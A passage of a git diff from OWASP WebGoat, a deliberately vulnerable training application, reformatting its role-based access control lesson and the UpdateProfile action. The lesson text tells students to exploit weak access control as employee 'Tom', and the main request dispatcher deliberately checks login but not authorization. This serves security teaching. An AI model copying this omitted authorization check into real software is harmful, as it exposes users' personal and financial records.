-     *  Gets the hints attribute of the DirectoryScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("Many sites attempt to restrict access to resources by role.");
-	hints
-		.add("Developers frequently make mistakes implementing this scheme.");
-	hints.add("Attempt combinations of users, roles, and resources.");
+	protected void registerActions(String className)
+	{
+		registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+		registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+		registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+		registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
 
-	// Stage 1
-	hints
-		.add("How does the application know that the user selected the delete function?");
-
-	// Stage 2
-
-	// Stage 3
-	hints
-		.add("How does the application know that the user selected any particular employee to view?");
-
-	// Stage 4
-	hints
-		.add("Note that the contents of the staff listing change depending on who is logged in.");
-
-	return hints;
-    }
-
-    @Override
-	public String[] getStages() {
-    	if (getWebgoatContext().isCodingExercises())
-    		return new String[] {STAGE1, STAGE2, STAGE3, STAGE4};
-    	return new String[] {STAGE1, STAGE3};
+		// These actions are special in that they chain to other actions.
+		registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
+		registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
+		registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
 	}
 
-    /**
-     *  Gets the instructions attribute of the ParameterInjection object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "";
-
-	if (!getLessonTracker(s).getCompleted())
+	/**
+	 * Gets the category attribute of the CommandInjection object
+	 * 
+	 * @return The category value
+	 */
+	public Category getDefaultCategory()
 	{
-		String stage = getStage(s);
-		if (STAGE1.equals(stage))
-	    {
-		    instructions = "Stage 1: Bypass Presentational Layer Access Control.<br>"
-			    + "As regular employee 'Tom', exploit weak access control to use the Delete function from the Staff List page.  "
-			    + "Verify that Tom's profile can be deleted.";
-	    }
-		else if (STAGE2.equals(stage))
+		return Category.ACCESS_CONTROL;
+	}
+
+	/**
+	 * Gets the hints attribute of the DirectoryScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Many sites attempt to restrict access to resources by role.");
+		hints.add("Developers frequently make mistakes implementing this scheme.");
+		hints.add("Attempt combinations of users, roles, and resources.");
+
+		// Stage 1
+		hints.add("How does the application know that the user selected the delete function?");
+
+		// Stage 2
+
+		// Stage 3
+		hints.add("How does the application know that the user selected any particular employee to view?");
+
+		// Stage 4
+		hints.add("Note that the contents of the staff listing change depending on who is logged in.");
+
+		return hints;
+	}
+
+	@Override
+	public String[] getStages()
+	{
+		if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2, STAGE3, STAGE4 };
+		return new String[] { STAGE1, STAGE3 };
+	}
+
+	/**
+	 * Gets the instructions attribute of the ParameterInjection object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "";
+
+		if (!getLessonTracker(s).getCompleted())
 		{
-		    instructions = "Stage 2: Add Business Layer Access Control.<br>"
-			    + "Implement a fix to deny unauthorized access to the Delete function. "
-			    + "Repeat stage 1.  Verify that access to Delete is properly denied.";
-		}
-		else if (STAGE3.equals(stage))
-		{
-		    instructions = "Stage 3: Breaking Data Layer Access Control.<br>"
-			    + "As regular employee 'Tom', exploit weak access control to View another employee's profile. Verify the access.";
-		}
-		else if (STAGE4.equals(stage))
-		{
-		    instructions = "Stage 4: Add Data Layer Access Control.<br>"
-			    + "Implement a fix to deny unauthorized access to this data. "
-			    + "Repeat stage 3.  Verify that access to other employee's profiles is properly denied.";
-	    }
-	}
-
-	return instructions;
-    }
-
-    public void handleRequest(WebSession s)
-    {
-	// Here is where dispatching to the various action handlers happens.
-	// It would be a good place verify authorization to use an action.
-
-	//System.out.println("RoleBasedAccessControl.handleRequest()");
-	if (s.getLessonSession(this) == null)
-	    s.openLessonSession(this);
-
-	String requestedActionName = null;
-	try
-	{
-	    requestedActionName = s.getParser().getStringParameter("action");
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    // Let them eat login page.
-	    requestedActionName = LOGIN_ACTION;
-	}
-	//System.out.println("Requested lesson action: " + requestedActionName);
-
-	try
-	{
-	    LessonAction action = getAction(requestedActionName);
-	    if (action != null)
-	    {
-		//System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + action.getActionName());
-		if (!action.requiresAuthentication())
-		{
-		    // Access to Login does not require authentication.
-		    action.handleRequest(s);
-		}
-		else
-		{
-		    if (action.isAuthenticated(s))
-		    {
-			action.handleRequest(s);
-		    }
-		    else
-			throw new UnauthenticatedException();
-		}
-	    }
-	    else
-		setCurrentAction(s, ERROR_ACTION);
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    System.out.println("Missing parameter");
-	    pnfe.printStackTrace();
-	    setCurrentAction(s, ERROR_ACTION);
-	}
-	catch (ValidationException ve)
-	{
-	    System.out.println("Validation failed");
-	    ve.printStackTrace();
-	    setCurrentAction(s, ERROR_ACTION);
-	}
-	catch (UnauthenticatedException ue)
-	{
-	    s.setMessage("Login failed");
-	    System.out.println("Authentication failure");
-	    ue.printStackTrace();
-	}
-	catch (UnauthorizedException ue2)
-	{
-	    s.setMessage("You are not authorized to perform this function");
-
-		// Update lesson status if necessary.
-		String stage = getStage(s);
-		if (STAGE2.equals(stage))
-		{
-			try
+			String stage = getStage(s);
+			if (STAGE1.equals(stage))
 			{
-			if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName) &&
-					!isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION))
-			{
-				setStageComplete(s, STAGE2);
+				instructions = "Stage 1: Bypass Presentational Layer Access Control.<br>"
+						+ "As regular employee 'Tom', exploit weak access control to use the Delete function from the Staff List page.  "
+						+ "Verify that Tom's profile can be deleted.";
 			}
-			} catch (ParameterNotFoundException pnfe)
+			else if (STAGE2.equals(stage))
 			{
-			pnfe.printStackTrace();
+				instructions = "Stage 2: Add Business Layer Access Control.<br>"
+						+ "Implement a fix to deny unauthorized access to the Delete function. "
+						+ "Repeat stage 1.  Verify that access to Delete is properly denied.";
+			}
+			else if (STAGE3.equals(stage))
+			{
+				instructions = "Stage 3: Breaking Data Layer Access Control.<br>"
+						+ "As regular employee 'Tom', exploit weak access control to View another employee's profile. Verify the access.";
+			}
+			else if (STAGE4.equals(stage))
+			{
+				instructions = "Stage 4: Add Data Layer Access Control.<br>"
+						+ "Implement a fix to deny unauthorized access to this data. "
+						+ "Repeat stage 3.  Verify that access to other employee's profiles is properly denied.";
 			}
 		}
-		//System.out.println("isAuthorized() exit stage: " + getStage(s));
-		// Update lesson status if necessary.
-		if (STAGE4.equals(stage))
-		{
-			try
-			{
-			//System.out.println("Checking for stage 4 completion");
-			DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
-			int userId = Integer.parseInt((String)s.getRequest().getSession().getAttribute(getLessonName() + "."
-					+ RoleBasedAccessControl.USER_ID));
-			int employeeId = s.getParser().getIntParameter(
-				RoleBasedAccessControl.EMPLOYEE_ID);
 
-			if (!action.isAuthorizedForEmployee(s, userId, employeeId))
-			{
-			    setStageComplete(s, STAGE4);
-			}
-			} catch (Exception e)
-			{
-				// swallow this - shouldn't happen inthe normal course
-				// e.printStackTrace();
-			}
+		return instructions;
+	}
+
+	public void handleRequest(WebSession s)
+	{
+		// Here is where dispatching to the various action handlers happens.
+		// It would be a good place verify authorization to use an action.
+
+		// System.out.println("RoleBasedAccessControl.handleRequest()");
+		if (s.getLessonSession(this) == null) s.openLessonSession(this);
+
+		String requestedActionName = null;
+		try
+		{
+			requestedActionName = s.getParser().getStringParameter("action");
+		} catch (ParameterNotFoundException pnfe)
+		{
+			// Let them eat login page.
+			requestedActionName = LOGIN_ACTION;
 		}
-		
-	    System.out.println("Authorization failure");
-	    setCurrentAction(s, ERROR_ACTION);
-	    ue2.printStackTrace();
-	}
-	catch (Exception e)
-	{
-	    // All other errors send the user to the generic error page
-	    System.out.println("handleRequest() error");
-	    e.printStackTrace();
-	    setCurrentAction(s, ERROR_ACTION);
-	}
+		// System.out.println("Requested lesson action: " + requestedActionName);
 
-	// All this does for this lesson is ensure that a non-null content exists.
-	setContent(new ElementContainer());
-    }
-
-
-    public void handleRequest_BACKUP(WebSession s)
-    {
-	// Here is where dispatching to the various action handlers happens.
-	// It would be a good place verify authorization to use an action.
-
-	//System.out.println("RoleBasedAccessControl.handleRequest()");
-	if (s.getLessonSession(this) == null)
-	    s.openLessonSession(this);
-
-	String requestedActionName = null;
-	try
-	{
-	    requestedActionName = s.getParser().getStringParameter("action");
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    // Let them eat login page.
-	    requestedActionName = LOGIN_ACTION;
-	}
-	//System.out.println("Requested lesson action: " + requestedActionName);
-
-	if (requestedActionName != null)
-	{
-	    try
-	    {
-		LessonAction action = getAction(requestedActionName);
-		if (action != null)
+		try
 		{
-		    //System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + action.getActionName());
-		    if (!action.requiresAuthentication())
-		    {
-			// Access to Login does not require authentication.
-			action.handleRequest(s);
-		    }
-		    else
-		    {
-			if (action.isAuthenticated(s))
+			LessonAction action = getAction(requestedActionName);
+			if (action != null)
 			{
-			    int userId = action.getUserId(s);
-			    if (action.isAuthorized(s, userId, action
-				    .getActionName()))
-			    {
-				action.handleRequest(s);
-			    }
-			    else
-			    {
-				throw new UnauthorizedException();
-			    }
+				// System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " +
+				// action.getActionName());
+				if (!action.requiresAuthentication())
+				{
+					// Access to Login does not require authentication.
+					action.handleRequest(s);
+				}
+				else
+				{
+					if (action.isAuthenticated(s))
+					{
+						action.handleRequest(s);
+					}
+					else
+						throw new UnauthenticatedException();
+				}
 			}
 			else
-			    throw new UnauthenticatedException();
-		    }
-		}
-		else
-		    setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (ParameterNotFoundException pnfe)
-	    {
-		System.out.println("Missing parameter");
-		pnfe.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (ValidationException ve)
-	    {
-		System.out.println("Validation failed");
-		ve.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (UnauthenticatedException ue)
-	    {
-		s.setMessage("Login failed");
-		System.out.println("Authentication failure");
-		ue.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
+				setCurrentAction(s, ERROR_ACTION);
+		} catch (ParameterNotFoundException pnfe)
 		{
-	    	String stage = getStage(s);
+			System.out.println("Missing parameter");
+			pnfe.printStackTrace();
+			setCurrentAction(s, ERROR_ACTION);
+		} catch (ValidationException ve)
+		{
+			System.out.println("Validation failed");
+			ve.printStackTrace();
+			setCurrentAction(s, ERROR_ACTION);
+		} catch (UnauthenticatedException ue)
+		{
+			s.setMessage("Login failed");
+			System.out.println("Authentication failure");
+			ue.printStackTrace();
+		} catch (UnauthorizedException ue2)
+		{
+			s.setMessage("You are not authorized to perform this function");
+
 			// Update lesson status if necessary.
+			String stage = getStage(s);
 			if (STAGE2.equals(stage))
 			{
 				try
 				{
-				if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName) &&
-						!isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION))
-				{
-					setStageComplete(s, STAGE2);
-				}
+					if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName)
+							&& !isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION))
+					{
+						setStageComplete(s, STAGE2);
+					}
 				} catch (ParameterNotFoundException pnfe)
 				{
-				pnfe.printStackTrace();
+					pnfe.printStackTrace();
 				}
 			}
-			//System.out.println("isAuthorized() exit stage: " + getStage(s));
+			// System.out.println("isAuthorized() exit stage: " + getStage(s));
 			// Update lesson status if necessary.
 			if (STAGE4.equals(stage))
 			{
 				try
 				{
-				//System.out.println("Checking for stage 4 completion");
-				DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
-				int userId = Integer.parseInt((String)s.getRequest().getSession().getAttribute(getLessonName() + "."
-						+ RoleBasedAccessControl.USER_ID));
-				int employeeId = s.getParser().getIntParameter(
-					RoleBasedAccessControl.EMPLOYEE_ID);
+					// System.out.println("Checking for stage 4 completion");
+					DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
+					int userId = Integer.parseInt((String) s.getRequest().getSession()
+							.getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID));
+					int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
 
-				if (!action.isAuthorizedForEmployee(s, userId, employeeId))
-				{
-				    setStageComplete(s, STAGE4);
-				}
+					if (!action.isAuthorizedForEmployee(s, userId, employeeId))
+					{
+						setStageComplete(s, STAGE4);
+					}
 				} catch (Exception e)
 				{
 					// swallow this - shouldn't happen inthe normal course
 					// e.printStackTrace();
 				}
 			}
-			
-		    s.setMessage("You are not authorized to perform this function");
-		    System.out.println("Authorization failure");
-		    setCurrentAction(s, ERROR_ACTION);
-		    ue2.printStackTrace();
+
+			System.out.println("Authorization failure");
+			setCurrentAction(s, ERROR_ACTION);
+			ue2.printStackTrace();
+		} catch (Exception e)
+		{
+			// All other errors send the user to the generic error page
+			System.out.println("handleRequest() error");
+			e.printStackTrace();
+			setCurrentAction(s, ERROR_ACTION);
 		}
-	    catch (Exception e)
-	    {
-		// All other errors send the user to the generic error page
-		System.out.println("handleRequest() error");
-		e.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
+
+		// All this does for this lesson is ensure that a non-null content exists.
+		setContent(new ElementContainer());
 	}
 
-	// All this does for this lesson is ensure that a non-null content exists.
-	setContent(new ElementContainer());
-    }
+	public void handleRequest_BACKUP(WebSession s)
+	{
+		// Here is where dispatching to the various action handlers happens.
+		// It would be a good place verify authorization to use an action.
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+		// System.out.println("RoleBasedAccessControl.handleRequest()");
+		if (s.getLessonSession(this) == null) s.openLessonSession(this);
 
+		String requestedActionName = null;
+		try
+		{
+			requestedActionName = s.getParser().getStringParameter("action");
+		} catch (ParameterNotFoundException pnfe)
+		{
+			// Let them eat login page.
+			requestedActionName = LOGIN_ACTION;
+		}
+		// System.out.println("Requested lesson action: " + requestedActionName);
 
-    /**
-     *  Gets the title attribute of the DirectoryScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return "LAB: Role Based Access Control";
-    }
+		if (requestedActionName != null)
+		{
+			try
+			{
+				LessonAction action = getAction(requestedActionName);
+				if (action != null)
+				{
+					// System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: "
+					// +
+					// action.getActionName());
+					if (!action.requiresAuthentication())
+					{
+						// Access to Login does not require authentication.
+						action.handleRequest(s);
+					}
+					else
+					{
+						if (action.isAuthenticated(s))
+						{
+							int userId = action.getUserId(s);
+							if (action.isAuthorized(s, userId, action.getActionName()))
+							{
+								action.handleRequest(s);
+							}
+							else
+							{
+								throw new UnauthorizedException();
+							}
+						}
+						else
+							throw new UnauthenticatedException();
+					}
+				}
+				else
+					setCurrentAction(s, ERROR_ACTION);
+			} catch (ParameterNotFoundException pnfe)
+			{
+				System.out.println("Missing parameter");
+				pnfe.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			} catch (ValidationException ve)
+			{
+				System.out.println("Validation failed");
+				ve.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			} catch (UnauthenticatedException ue)
+			{
+				s.setMessage("Login failed");
+				System.out.println("Authentication failure");
+				ue.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				String stage = getStage(s);
+				// Update lesson status if necessary.
+				if (STAGE2.equals(stage))
+				{
+					try
+					{
+						if (RoleBasedAccessControl.DELETEPROFILE_ACTION.equals(requestedActionName)
+								&& !isAuthorized(s, getUserId(s), RoleBasedAccessControl.DELETEPROFILE_ACTION))
+						{
+							setStageComplete(s, STAGE2);
+						}
+					} catch (ParameterNotFoundException pnfe)
+					{
+						pnfe.printStackTrace();
+					}
+				}
+				// System.out.println("isAuthorized() exit stage: " + getStage(s));
+				// Update lesson status if necessary.
+				if (STAGE4.equals(stage))
+				{
+					try
+					{
+						// System.out.println("Checking for stage 4 completion");
+						DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
+						int userId = Integer.parseInt((String) s.getRequest().getSession()
+								.getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID));
+						int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID);
+
+						if (!action.isAuthorizedForEmployee(s, userId, employeeId))
+						{
+							setStageComplete(s, STAGE4);
+						}
+					} catch (Exception e)
+					{
+						// swallow this - shouldn't happen inthe normal course
+						// e.printStackTrace();
+					}
+				}
+
+				s.setMessage("You are not authorized to perform this function");
+				System.out.println("Authorization failure");
+				setCurrentAction(s, ERROR_ACTION);
+				ue2.printStackTrace();
+			} catch (Exception e)
+			{
+				// All other errors send the user to the generic error page
+				System.out.println("handleRequest() error");
+				e.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			}
+		}
+
+		// All this does for this lesson is ensure that a non-null content exists.
+		setContent(new ElementContainer());
+	}
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the DirectoryScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return "LAB: Role Based Access Control";
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
index f5bddc3a0..56b805267 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons.RoleBasedAccessControl;
 
-import java.sql.PreparedStatement;
+import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
@@ -15,286 +15,251 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class UpdateProfile extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-
-    public UpdateProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName, LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException,
-	    ValidationException
-    {
-	if (isAuthenticated(s))
+	public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + RoleBasedAccessControl.USER_ID);
-
-	    int subjectId = s.getParser().getIntParameter(
-		    RoleBasedAccessControl.EMPLOYEE_ID, 0);
-
-	    String firstName = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.FIRST_NAME);
-	    String lastName = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.LAST_NAME);
-	    String ssn = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.SSN);
-	    String title = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.TITLE);
-	    String phone = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.PHONE_NUMBER);
-	    String address1 = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.ADDRESS1);
-	    String address2 = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.ADDRESS2);
-	    int manager = s.getParser().getIntParameter(
-		    RoleBasedAccessControl.MANAGER);
-	    String startDate = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.START_DATE);
-	    int salary = s.getParser().getIntParameter(
-		    RoleBasedAccessControl.SALARY);
-	    String ccn = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.CCN);
-	    int ccnLimit = s.getParser().getIntParameter(
-		    RoleBasedAccessControl.CCN_LIMIT);
-	    String disciplinaryActionDate = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.DISCIPLINARY_DATE);
-	    String disciplinaryActionNotes = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.DISCIPLINARY_NOTES);
-	    String personalDescription = s.getParser().getStringParameter(
-		    RoleBasedAccessControl.DESCRIPTION);
-
-	    Employee employee = new Employee(subjectId, firstName, lastName,
-		    ssn, title, phone, address1, address2, manager, startDate,
-		    salary, ccn, ccnLimit, disciplinaryActionDate,
-		    disciplinaryActionNotes, personalDescription);
-
-	    if (subjectId > 0)
-	    {
-		this.changeEmployeeProfile(s, userId, subjectId, employee);
-		setRequestAttribute(s, getLessonName() + "."
-			+ RoleBasedAccessControl.EMPLOYEE_ID, Integer
-			.toString(subjectId));
-	    }
-	    else
-		this.createEmployeeProfile(s, userId, employee);
-
-	    try
-	    {
-		chainedAction.handleRequest(s);
-	    }
-	    catch (UnauthenticatedException ue1)
-	    {
-		System.out.println("Internal server error");
-		ue1.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
-	    {
-		System.out.println("Internal server error");
-		ue2.printStackTrace();
-	    }
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
 	}
-	else
-	    throw new UnauthenticatedException();
-    }
 
-
-    public String getNextPage(WebSession s)
-    {
-	return RoleBasedAccessControl.VIEWPROFILE_ACTION;
-    }
-
-
-    public void changeEmployeeProfile(WebSession s, int userId, int subjectId,
-	    Employee employee) throws UnauthorizedException
-    {
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException
 	{
-	    // Note: The password field is ONLY set by ChangePassword
-			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
-				+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
-				+ " personal_description = ? WHERE userid = ?;";
-	    try
-	    {
-			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-
-			ps.setString(1, employee.getFirstName());
-			ps.setString(2, employee.getLastName());
-			ps.setString(3, employee.getSsn());
-			ps.setString(4, employee.getTitle());
-			ps.setString(5, employee.getPhoneNumber());
-			ps.setString(6, employee.getAddress1());
-			ps.setString(7, employee.getAddress2());
-			ps.setInt(8, employee.getManager());
-			ps.setString(9, employee.getStartDate());
-			ps.setString(10, employee.getCcn());
-			ps.setInt(11, employee.getCcnLimit());
-			ps.setString(12, employee.getPersonalDescription());
-			ps.setInt(13, subjectId);
-			ps.execute();
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error updating employee profile");
-		sqle.printStackTrace();
-	    }
+		if (isAuthenticated(s))
+		{
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
 
+			int subjectId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID, 0);
+
+			String firstName = s.getParser().getStringParameter(RoleBasedAccessControl.FIRST_NAME);
+			String lastName = s.getParser().getStringParameter(RoleBasedAccessControl.LAST_NAME);
+			String ssn = s.getParser().getStringParameter(RoleBasedAccessControl.SSN);
+			String title = s.getParser().getStringParameter(RoleBasedAccessControl.TITLE);
+			String phone = s.getParser().getStringParameter(RoleBasedAccessControl.PHONE_NUMBER);
+			String address1 = s.getParser().getStringParameter(RoleBasedAccessControl.ADDRESS1);
+			String address2 = s.getParser().getStringParameter(RoleBasedAccessControl.ADDRESS2);
+			int manager = s.getParser().getIntParameter(RoleBasedAccessControl.MANAGER);
+			String startDate = s.getParser().getStringParameter(RoleBasedAccessControl.START_DATE);
+			int salary = s.getParser().getIntParameter(RoleBasedAccessControl.SALARY);
+			String ccn = s.getParser().getStringParameter(RoleBasedAccessControl.CCN);
+			int ccnLimit = s.getParser().getIntParameter(RoleBasedAccessControl.CCN_LIMIT);
+			String disciplinaryActionDate = s.getParser().getStringParameter(RoleBasedAccessControl.DISCIPLINARY_DATE);
+			String disciplinaryActionNotes = s.getParser()
+					.getStringParameter(RoleBasedAccessControl.DISCIPLINARY_NOTES);
+			String personalDescription = s.getParser().getStringParameter(RoleBasedAccessControl.DESCRIPTION);
+
+			Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
+					manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
+					personalDescription);
+
+			if (subjectId > 0)
+			{
+				this.changeEmployeeProfile(s, userId, subjectId, employee);
+				setRequestAttribute(s, getLessonName() + "." + RoleBasedAccessControl.EMPLOYEE_ID, Integer
+						.toString(subjectId));
+			}
+			else
+				this.createEmployeeProfile(s, userId, employee);
+
+			try
+			{
+				chainedAction.handleRequest(s);
+			} catch (UnauthenticatedException ue1)
+			{
+				System.out.println("Internal server error");
+				ue1.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				System.out.println("Internal server error");
+				ue2.printStackTrace();
+			}
+		}
+		else
+			throw new UnauthenticatedException();
 	}
-	catch (Exception e)
+
+	public String getNextPage(WebSession s)
 	{
-	    s.setMessage("Error updating employee profile");
-	    e.printStackTrace();
+		return RoleBasedAccessControl.VIEWPROFILE_ACTION;
 	}
-    }
 
-
-    public void changeEmployeeProfile_BACKUP(WebSession s, int userId,
-	    int subjectId, Employee employee) throws UnauthorizedException
-    {
-	try
+	public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee)
+			throws UnauthorizedException
 	{
-	    // Note: The password field is ONLY set by ChangePassword
-			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
-				+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
-				+ " personal_description = ? WHERE userid = ?;";
-	    try
-	    {
-			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-
-			ps.setString(1, employee.getFirstName());
-			ps.setString(2, employee.getLastName());
-			ps.setString(3, employee.getSsn());
-			ps.setString(4, employee.getTitle());
-			ps.setString(5, employee.getPhoneNumber());
-			ps.setString(6, employee.getAddress1());
-			ps.setString(7, employee.getAddress2());
-			ps.setInt(8, employee.getManager());
-			ps.setString(9, employee.getStartDate());
-			ps.setString(10, employee.getCcn());
-			ps.setInt(11, employee.getCcnLimit());
-			ps.setString(12, employee.getPersonalDescription());
-			ps.setInt(13, subjectId);
-			ps.executeUpdate(query);
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error updating employee profile");
-		sqle.printStackTrace();
-	    }
+		try
+		{
+			// Note: The password field is ONLY set by ChangePassword
+			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+					+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+					+ " personal_description = ? WHERE userid = ?;";
+			try
+			{
